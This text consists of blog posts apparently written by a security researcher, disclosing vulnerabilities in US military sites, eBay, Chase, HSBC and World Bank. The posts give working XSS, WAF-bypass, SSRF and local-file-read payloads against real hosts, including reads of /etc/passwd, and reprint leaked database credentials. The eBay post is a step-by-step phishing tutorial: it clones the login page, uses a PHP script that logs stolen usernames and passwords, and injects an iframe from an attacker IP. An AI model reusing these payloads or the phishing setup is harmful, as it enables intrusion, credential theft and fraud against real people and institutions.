Below is the output of their shadow file with the sensitive info covered over – although they have took the server down, if they were to bring it back up after patching the vulnerability there’s a chance they may not have changed the credentials for the users fully and we don’t want someone cracking the root password and opening an SSH connection to their server, hence me blocking it out. Also it should be noted that they are using MD5 format for the shadow hashes, rather than something that’s actually somewhat secure like $6 hashes.

aaaaaaaaaaaaa

Next, I stumble across this (I really hope this is an outdated subversion containing old credentials, and not current live credentials!):

Here is the file I found (config.php):

http://adh.usace.army.mil/svn/adh/adh-doc/svnScripts/include/config.php

Here is some of the output:

//
// This is the username for your database connection
// This is the hostname for your database connection
// This is your password for your database connection
if ($WHERE=="TEST")
{
	$dbuser = "dbSVNuser";
	$dbhost = "as2.erdc.dren.mil";
	$dbpassword = "mysecretpassword";
}
else
{
	$dbuser = "dbSVNuser";
	$dbhost = "as2.erdc.dren.mil";
	$dbpassword = "mysecretpassword";
}
// This is your database name
$database = "SVNmanage";

If ‘mysecretpassword’ is actually a valid credential for a DBMS connection to a military server, then they have some pretty serious issues (moreso than the SQLi and LFD considering this wouldn’t be a vulnerability in the sense that the software was badly written, but moreso in the sense that whoever put that file there is beyond stupid – definitely not the kind of person you’d want to be administrating a military system), here is a screenshot of the output from config.php:

ddddddddddddddddd

Now I will cover some more minor vulnerabilities i’ve identified in .mil systems (namely XSS), first off i’ve noticed that a bunch of .mil systems have controlled redirects in which the user is warned before they are redirected and told to click the link of the site (embedded on the page) that they are redirecting to, in order to be redirected to their site of choice.

To exploit this its just the case of redirecting to the javascript: directive and then clicking the destination “URL”, like so:

javascript:alert(document.domain)

This will now be working in a similar way that an attrib-based XSS would be while using the onclick= event handler.

The first live example I will display this on is a disa.mil subdomain – Here is an explanation of what DISA is:

The Defense Information Systems Agency (DISA), known as the Defense Communications Agency (DCA) until 1991, is a United States Department of Defense (DoD) combat support agency composed of military, federal civilians, and contractors. DISA provides information technology (IT) and communications support to the President, Vice President, Secretary of Defense, the military services, the combatant commands, and any individual or system contributing to the defense of the United States.

According to the mission statement on the agency website, DISA “provides, operates, and assures command and control, information sharing capabilities, and a globally accessible enterprise information infrastructure in direct support to joint warfighters, National level leaders, and other mission and coalition partners across the full spectrum of operations.” DISA’s vision is “Information superiority in defense of our Nation.”

Although its only XSS, should a site that is responsible for offering computing support to the likes of the president and military services be vulnerable to something so basic?
Here is the live URL at the time of testing:
Screenshot:
DSSSSSSSS

 

It should be noted that the above vulnerability is on a login portal for Department of Defense employees – based on some initial testing it would appear that hijacking cookies is a possibility here (along with spear phishing of course – although this would be ineffective due to the disclaimer about an external site). If an attacker had some interaction with employees that had access to this login portal and managed to hijack their cookies and authenticate as them, the implications could be huge (potential access to classified data, etc)

While the above vulnerability is via ASP.NET, there are more via many other technologies that are vulnerable in the exact same sense, here is pretty much the same vulnerability in an army.mil server but through ColdFusion this time:

http://corpslakes.usace.army.mil/employees/link.cfm?Link=javascript:alert%28document.domain%29

Screenshot:

Screenshot_2016-01-17_14-34-03

Now time for some more conventional (typical GET-based reflective) XSS within the .mil domain, here is the first:

https://www.dmdc.osd.mil/appj/dwp/searchResults.jsp?search=%22%3E%3Csvg%2Fonload%3Dconfirm%28document.domain%29%3E

This is the Defense Manpower Data Center, which is part of the Office of the Secretary of Defence, a headquarter-level staff section of the Department of Defense, here is the output of the URL at the time:

Screenshot_2016-01-17_14-37-14

Next up is the National Geospatial Intelligence Agency:

URL:

https://datahost.nga.mil/elist/email_escribe.php?type=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

Screenshot:

nga

and another (more than just XSS here if you search hard enough😉 ):

URL:

http://msi.nga.mil/NGAPortal/msi/query_results.jsp?MSI_queryType=BroadcastWarning&MSI_generalFilterType=Category&MSI_generalFilterValue=12%27%22%3E%3Csvg/onload=confirm%28document.domain%29%3E&MSI_additionalFilterType1=All&MSI_additionalFilterType2=-999&MSI_additionalFilterValue1=-999&MSI_additionalFilterValue2=-999&MSI_outputOptionType1=SortBy&MSI_outputOptionType2=-999&MSI_outputOptionValue1=Number_DESC&MSI_outputOptionValue2=-999

Screenshot:

nga2

Now onto some more XSS that require WAF bypass (funny thing… they actually removed a fairly decent WAF for no apparent reason).

This is in a bunch of .mil sites running APEX Engine (more info here https://www.packtpub.com/packtlib/book/Application-Development/9781847194527/3/ch03lvl1sec05/The%20f?p%20URL%20notation), I was originally triggering the XSS within browser context rather than domain, via redirecting to a data: uri within the URL param like so:

http://www.militaryinstallations.dod.mil/MOS/f?p=MI:5:0::::url:type=external|url=data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTUE9TRUQvKTwvc2NyaXB0Pg==

Ideally you would want this to be triggered within domain context, and it can be done so via use of HTML Char Escape sequences to stop alert/prompt/confirm being filtered by the WAF and use of // in place of the closing HTML tag.

Thanks to @mradamdavies for the following method (he turned it into content injection also https://twitter.com/mradamdavies/status/678788157639389184)

this is the bypass method that was used:

http%3A//www.owned.com”><svg/onload=pr\u006fmp\u0074(document.domain)//

Screenshot:

milllll

Some more .mil sites vulnerable to the same thing:

http://www.usa4militaryfamilies.dod.mil/pls/psgprod/f?p=MI:5:0::::url:type=external|url=http%3A//www.owned.com%22%3E%3Csvg/onload=pr\u006fmp\u0074%28document.domain%29//

http://www.militaryonesource.mil/pls/psgprod/f?p=PMM:5:0::::url:type=external|url=http%3A//www.vuln.org%22%3E%3Csvg/onload=pr\u006fmp\u0074%28document.domain%29//

http://apps.militaryonesource.mil/pls/psgprod/f?p=PMM:5:0::::url:type=external|url=http%3A//www.vuln.org%22%3E%3Csvg/onload=pr\u006fmp\u0074%28document.domain%29//

Also it should be noted that many other sites are running apex engine and are vulnerable to the exact same thing (oracle.com being one example)

Next is some POST-based XSS in a navy.mil server (in their Chief of Naval Air Training subdomain):

https://www.cnatra.navy.mil/pubs.asp

POST DATA:

searchTextbox=”><svg%2Fonload%3Dconfirm(0)>

Screenshot:

Screenshot_2016-01-13_18-02-53

and finally I will finish up with some reflective GET-based XSS in apd.army.mil – they had a filter setup here so that your inputs were converted from lowercase to uppercase, meaning that HTML could be injected no problem, but injecting javascript was more tricky (due to HTML being case insensitive whereas javascript is case sensitive), the first thing to try in a case like this would be to use script tags to remotely include the javascript payload using the src= attribute within a script tag to include a .JS file from a remote URL

this payload still wasn’t working for 3 reasons, the first reason being that spaces were being stripped so and secondly http:// was being stripped from the URL so the javascript payload wasn’t being included remotely as intended, the third issue is that the starting script tag was partially stripped too – one way around this would be to use object tags like so:

< object type = ” “text/x-scriptlet ” data= ” http://jsfiddle.net//fb5upheq ” >< / object>

Although this will still produce an alert (and is considered valid XSS by OWASP) it still isn’t ideal as the script isn’t executing within the context of the domain, thanks to @asdizzle_ for some help with this bypass method:

” > < / title > < script / src=” // http://www.xssposed.org/ 1.JS “> < / script >

Note, the above payloads don’t have spaces, script/src= works in the same manner as script src= would, the use of the closing title tag at the start is to prevent the first script tag from being filtered, and // can be used in place of http:// (which should be remembered as it can come in handy in XSSes when you have a limit to the amount of chars that you can inject)

Screenshot:

sssssss1

These are just some of many examples of vulnerabilities in US Military systems, and it should be noted that i’ve made many efforts to contact them so I can report these, and that I didn’t release any details on the more serious vulnerabilities until after i’d managed to confirm that they had been patched.

For some reason, the military are practically impossible to contact when it comes to reporting vulnerabilities – not only do they not have a bug bounty programme (which is understandable) but they actually have no viable means of researchers being able to reach out to them in order to report vulnerabilities, I guess they have the mindset that their systems are secure therefore there is no need to have a channel through which people can report potential security risks. There has been much discussion in the past about calls for an army bug bounty programme or at the very least some kind of platform where someone can report vulnerabilities with ease – but for some reason this hasn’t yet been implemented (despite the Army themselves suggesting it – see here: http://securityaffairs.co/wordpress/41474/intelligence/us-army-all-bug-bounty-avrp.html and also here: http://www.cyberdefensereview.org/2015/10/23/avrp/)

I know I said my next post was going to be on some of the more sophisticated phishing techniques, but that’s coming next I promise🙂

that’s all for now,

M.

 

 

 

 

A tale of eBay XSS and shoddy incident response

Hello, this blog post will highlight exactly how easy it is to exploit XSS vulnerabilites in large sites, and will also highlight how little these companies actually care (until they run the risk of being publicly exposed). I’ll be keeping this post fairly short, just showing a quick demonstration of how easy it is to exploit things like this. As of writing this blog post, the vulnerability is now patched – but it should be pointed out that I waited a month with no response from eBay, and they only rushed to patch the vulnerability after the media contacted them about it.

Take the following URL:

http://ebay.com/link/?nav=webview&url=javascript:alert(document.cookie)

Screenshot of live URL:

ebay

This is a fairly basic vulnerability (no WAF bypass or anything of that sort required) on a site where XSS would generally be considered a huge issue (even moreso since the main domain is involved). It should be noted that while the following URL is crafted to display the document.cookie output, cookies cannot be stolen due to the HttpOnly flag being set.

In the cases of some sites, spear phishing is considered useless (for example if the site does not have a large userbase that requires logins), although in the case of this site, spear phishing has many valid uses – it could be used to steal funds from people, use trusted eBay accounts to scam other users, and more.

First I am going to explain the steps required to setup an authentic looking phishing page, then I am going to apply these steps to eBay to show how easily this can be achieved. Obviously the first step would be to obtain a copy of the website’s source for the login page. You could do this by saving the source code after viewing it manually, but this is time consuming and inefficient, as for the page to look identical you would need to individually download every single image that’s on the page and ensure that they are saved in the correct directories, as well as creating a bunch of relevant directories or altering the paths to images and other pages in the source code. Alternatively you can use some website mirroring software to automate this process, which is what I suggest doing.

The software I suggest using is WebHTTrack, because it is efficient, easy to use, and cross platform. To install it on windows, just download the executable and run it. To install on linux (debian based) use the following commands:

apt-get update
apt-get install webhttrack

 

To install on other distros (such as CentOS/RHEL) just wget/cURL the tarball and unpack it then configure, the following commands can be used:

yum install zlib-devel
wget http://download.httrack.com/cserv.php3?File=httrack.tar.gz -O httrack.tar.gz
tar xvfz httrack.tar.gz
./configure
make && sudo make install

The screenshots below will detail the process required to mirror the site via WebHTTrack (for this demonstration I will be using the web-based client for linux):

httrack1

This page should launch locally in your browser after running the app

httrack2

The next step is to choose your project name and set the path to where you want the files to be mirrored

httrack3

After this, its just a case of inputting the URL to the page you want to mirror. There are also some other additional options you can select, but the default options will work fine.

After this, the mirroring process will begin. If all goes well, you should have all of the files for the page you specified, downloaded to the directory that you specified:

ebayy

After this, you need to change the form inputs for the page (for the login form) to send data to your PHP script (more on this soon), rather than a login script that is part of eBay:

DSDSDS

Use a text editor to search for the form tag within the HTML source for the login page, and change the action= attribute to point to the name of your PHP script. After this you’ll want to upload the relevant files to your site (presumably in the /var/www/html directory). To do this I suggest using an FTP/SFTP client such as FileZilla.

Once you’ve got the files uploaded to the relevant directory, its time to make the PHP script (obviously you’ll need PHP installed alongside your HTTP daemon for this), here is the script I used:

root@MLT:/var/www/html/ebay/signin.ebay.com/ws# cat log.php
<?php

file_put_contents(“log.txt”, $_GET[‘1383430133’].”:”.$_GET[‘1794992350’].PHP_EOL,FILE_APPEND);

die(header(‘Location: http://ebay.com/&#8217;));
?>

If you’re modifying this for another site, you’ll need to change the GET inputs to match those relevant to the site in question.

Next, you’ll have to ensure that the permissions are correctly setup so that you can write to your logfile (log.txt), the following command can be used:

chmod +x log.txt

After this, you can test it locally on your site by loading the login form and entering a username and password, then checking log.txt to see if it writes to it as expected.

The next step is to include the link to your phishing page within the context of the vulnerable site. In the example of ebay, the XSS vulnerability was not tag-based but was rather pure javascript, so rather than including an iframe directly as input to the ?url= get param, the javascript document.write function needed to be used to write the HTML contents to the page and embed the iframe.

In the case of ebay, the iframe containing my phishing page was injected to the page using the following payload:

document.write(‘<iframe src=”http://45.55.162.179/ebay/signin.ebay.com/ws/eBayISAPI9f90.html&#8221; width=”1500″ height=”1000″>’)

further obfuscation could be used, for example urlencoding the remote URL and adding FRAMEBORDER=”0″ attribute to the iframe to remove the border of the frame, but for the purposes of demonstrating this vulnerability the above payload will work fine.

Here is the full URL at time of injection:

http://ebay.com/link/?nav=webview&url=javascript:document.write%28%27%3Ciframe%20src=%22http://45.55.162.179/ebay/signin.ebay.com/ws/eBayISAPI9f90.html%22%20width=%221500%22%20height=%221000%22%3E%27%29

and here is a screenshot of the live URL:

ebayyyy

After the user credentials are entered on the phishing page that appears to be part of ebay.com, a GET request is made to log.php on my server and the inputs are written to log.txt available for me to read in plaintext.

Here is a video proof of concept, demonstrating the vulnerability in real-time:

This post was intended for beginners to give them an understanding of what steps are required to setup a phishing page to be used for spear phishing. I will update this post later with my correspondance with ebay, to give anyone who’s reading this an idea of how you should not handle security incidents relating to your site.

My next blog post will cover some of the more advanced phishing techniques, such as how to properly obfuscate a spear phishing attack, and an explanation of methods such as bitsquatting and IDN homograph attacks.

That’s all for now

M.

 

Hacking banks for fun and profit

Greetings, this is my first blog post. In this post I will be detailing some vulnerabilities I have identified after doing some quick tests on several banks. It’s a sad state of affairs when you can find vulns such as XSS, CSRF and LFI on many major banks.

I’ll start up with some of the more minor vulnerabilities, while the banks generally *do* tend to have good XSS filters in place, they seem to forget about the dangers of redirects (in some of these cases the redirects can easily be turned into XSS).

The banks I start with are JPMorgan / Chase, within 5 minutes I found some open redirect vulnerabilities, with no authorisation required to redirect to an external site, and no warning message to tell the user they’re about to be redirected. Below are the examples (redirecting to my blog for the case of this example):

http://commercialbanking.chase.com/etrack.ashx?M=1725.7b601f6c-c54d-456a-b31b-364c5c501873&L=29102&URL=https://ret2libc.wordpress.com/

Note: these are both using the same thing to redirect.

http://jpmts.jpmorgan.com/etrack.ashx?M=1212.721a7f5a-1828-4e96-b937-d73ca54e3033&URL=https://ret2libc.wordpress.com/

The security risk here, of course, is that an unsuspecting user could click a seemingly innocent URL which appears to be part of the bank’s website, and then be redirected to a phishing page where they are prompted to enter their account details.

Another risk related to open redirects is cross site request forgery, as a user could redirect another user of the bank to links that are still part of the site but that could be used to execute unauthorised actions from the account of the victim who clicks the link.

One trick is to redirect directly to a data: URI with a base64 encoded input cotaining your HTML/JavaScript, allowing you to build the fake login page in the context of the victims browser itself rather than within the context of another site. It could be argued that this offers further obfuscation as the victims address bar won’t display a phony URL but will instead just display ‘data:’ (assuming that padding is added to the uri, in which case the base64 encoded inputs will not be displayed in the address bar)

An example payload would look something like:

data:text/html;base64,PHNjcmlwdD5hbGVydCgnRXhhbXBsZScpPC9zY3JpcHQ+

the first part of the string is telling the browser what kind of data to be expecting, and the second part of the string (after the comma) is the base64 encoded input that would contain your HTML for your phishing page or whatever you decided to use on the victim,

to break that down:

HNjcmlwdD5hbGVydCgnRXhhbXBsZScpPC9zY3JpcHQ+

is a base64 encoded version of:

alert(‘Example’)

A live example of the URL can be found here:

http://commercialbanking.chase.com/etrack.ashx?M=1725.7b601f6c-c54d-456a-b31b-364c5c501873&L=29102&URL=data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTUE9TRUQvKTwvc2NyaXB0Pg==

It should be noted that the above URL is only working in Firefox, here is another example in another large bank (HSBC):

http://fundexpress.tw.personal-banking.hsbc.com/FileProxy.aspx?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTUE9TRUQvKTwvc2NyaXB0Pg==

The fact that this can be used to spear phish and force malicious downloads is kinda scary, but the fact that the uri is operating under the context of the victims browser rather than the site means that hijacking cookies via this method is not possible, which brings me onto the next section of this blog post. Having an XSS that affects a bank wherein cookie hijacking is a real possibility seems like an interesting challenge, so I moved onto my next target, World Bank.

After maybe 5 minutes of searching, I found a valid vulnerability (although some user interaction is required, It requires them to interact in the way that they would be expected to anyway).

It is again using a URL= GET paramater, but it is loading the javascript within the context of the site this time rather than within the context only of the victims browser (in other words, it’s reflected)

Here is the vulnerable URL (in order to trigger it you must click ‘here’):

https://wbssoextcl.worldbank.org/regconfirm.jsp?URL=javascript:alert%28document.cookie%29

Screenshot:

rektXSS Vulnerability in a bank, affecting cookies (albeit reflective). At this point I decide to do some more digging and look for something more major, and I come across the following URL:

https://remittanceprices.worldbank.org/en/corridorgenpdf?url=

At first I assume its an open redirect, but then I realized its something far more interesting. You give it a URL and it takes the URL as an input, converts it to PDF format, and prompts the user to download it. Here is a working example:

https://remittanceprices.worldbank.org/en/corridorgenpdf?url=http://twitter.com/ret2libc

It coverts the user-supplied URL into PDF format as seen here:

pfd.png

Now the risk associated with this is that a user could be served content as a PDF from a trusted source (world bank) and that PDF could contain contact information that puts the victim right in touch with a fraudster or links them to a phishing website. It would just be a case of setting up the output you want to be served to the user on one of your servers, then setting it as the input for ?URL= param. Pretty interesting vector (comparable to the CEMI aka CSV Excel Macro Injection bugs that have been floating around lately), but still not too high of a security risk – probably about the same level as a reflective XSS or the redirects to data: URI’s as displayed at the start of this post.

My next thought was, if it’s getting remote URL’s and serving them as PDF’s, what’s to stop it from getting local URL’s?

I then attempted some testing for SSRF / XSPA and it worked like a charm.

The following URL was inputted for testing (in attempt to see whether I could probe for info on their SMTP daemon):

https://remittanceprices.worldbank.org/en/corridorgenpdf?url=http://127.0.0.1:25

as you can see from the screenshot below, here is the output, converted to a PDF file by a script on their server and downloaded for anyone to view:

ssrf

Here’s another test, this time probing the MySQL port to see if the version info is disclosed, using the following input:

http://127.0.0.1:3306

Once again, worked with no issues:

mysql

The SSRF alone is a pretty nasty vuln, but instantly after finding this my next thought is can it be leveraged to LFI via the file:/// handler?

Short answer: yes, it can. Easily.

First I tried probing for /etc/hosts, via the following input:

file://etc/hosts

the result? a blank PDF. I then try using only one foward slash rather than 2, example:

file:/etc/hosts

Worked instantly. Readable local system files on a large financial institution:

lol0lThe final test I made before reporting (nope, I’d rather not exploit this – I appreciate my anal virginity) was using the file:/// handler to see if /etc/passwd was readable, and once again there it is, served to me straight away as a PDF file:

passwd.pngAfter this I find a ?filename= param while searching for some more XSS (preferably one that requires no user interaction). I immediately begin testing for LFD and at first it fails, using the following method:

../../../../../../../../etc/passwd

I notice the foward slashes are being stripped, and a file extension is being appended by default, so I try some encoding and the addition of a nullbyte to see if I can get around it, my payload now looks like this:

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00

and it works instantly (despite throwing a 404 message at me):

Lfd

After finding these vulnerabilties, my next thought is to report them to allow the sysadmins some time to patch – so I start looking for a contact method which leads me to their next huge failure.

I find an email contact form, located at http://web.worldbank.org/external/default/main?pagePK=50041377&piPK=50041375&theSitePK=225714&contentMDK=22879511

You can see the form below:

Screenshot_2016-01-03_15-54-47

I enter my own email address as the recipient’s email, then I enter admin@worldbank.org as my own email, as seen below:

Screenshot_2016-01-03_15-56-48

I enter the captcha and click ‘send’ and instantly get a prompt confirming that the mail has been sent:

1

I check my email to confirm, and here we go, a message from DO_NOT_REPLY@worldbank.org telling me that admin@worldbank.org has sent me a message:

12

The fact someone has INTENTIONALLY made this is kinda scary, a site like this should not have such incompetent sysadmins. This could be paired with the XSS in worldbank.org to effectively hijack cookies or launch other attacks, here is an example attack scenario:

  • Attacker obtains a list of email addresses associated with worldbank.org
  • Attacker then sends out mail seemingly from admin@worldbank.org to the emails in the list
  • Emails contain a link to the XSS with a payload setup to hijack cookies and store them on the attackers server
  • victims click link
  • ???
  • PROFIT

Generally it would be time consuming for an attacker to obtain a list of emails associated with a site, but in the case of world bank it’s trivial, simply request the page to view a list of email notification subscribers:

https://icsid.worldbank.org/apps/ICSIDWEB/_layouts/mobile/view.aspx?List=08cea935-2ea4-4c00-8943-137e4974068e&View=4496ef14-9fde-4f3b-ba03-89a02d8f6a7b

List of subscribers available for anyone to read:

wwww

Not only that, but if an attacker wanted to personally tailor the emails to a target, they can find out their personal information by simply clicking their name within the subscriber list:

lolwow

As of publishing this blog post, i’ve recieved no reply from worldbank.org – I have recieved a reply from Chase/JPMorgan, but no reply from HSBC – I have something similar (SSRF/LFD) in HSBC but since they actually seem to care about their security I will withhold this information until after a patch.

Happy Hunting,

M.